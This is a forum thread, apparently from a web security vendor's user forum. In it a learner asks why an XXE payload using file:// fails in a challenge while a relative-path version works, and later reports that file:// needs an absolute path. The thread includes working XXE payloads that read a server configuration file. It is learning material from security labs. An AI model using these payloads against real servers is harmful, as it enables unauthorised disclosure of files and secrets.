Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

XXE file protocol to retrieve files

Jaak | Last updated: Jun 17, 2022 09:41PM UTC

Hello, first of all: Thanks for the amazing learning materials, I have really learned a lot! My question concerns XXE, specifically the "file" protocol mentioned in the learning materials. It says that: "The declaration of an external entity uses the SYSTEM keyword and must specify a URL from which the value of the entity should be loaded [...] The URL can use the file:// protocol, and so external entities can be loaded from file. For example: <!DOCTYPE foo [ <!ENTITY ext SYSTEM "file:///path/to/file" > ]>" Now, while that works in the portswigger labs I have had one encounter in a different challenge where using the file protocol to retrieve a file fails: <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///../../core/config.dat"> ]><root><email>&xxe;</email><password>abc</password></root> (I get error messages instead of the contents of the file), while just using the file name (without the file protocol) works just fine: <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "./../../core/config.dat"> ]><root><email>&xxe;</email><password>abc</password></root> The error message provided is basically: Warning: DOMDocument::loadXML():I/O warning: failed to load external entity "file:///../core/config.dat" in process.php Now what I'd like to know: 1) Does anyone know why that is? Might it be because of how the lab/underlying infrastructure is set up? 2) Is it better/possible to always only use the path to the file without the "file" protocol?

Jaak | Last updated: Jun 17, 2022 09:55PM UTC

Issue solved: When using the file protocol, you always have to specify the absolute file path, not the relative one. Just tried that now and it works. Also it seems without using the file protocol, it always takes relative file path. However, if anyone knows an answer to the following question, would be greatly appreciated: There are several "protocols", not just the "file" one but also http, ftp, ... Do these always work by default or do they have to be "enabled" first. I understand that if they're intentionally blocked, they wont work obviously but what is the default behaviour?

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.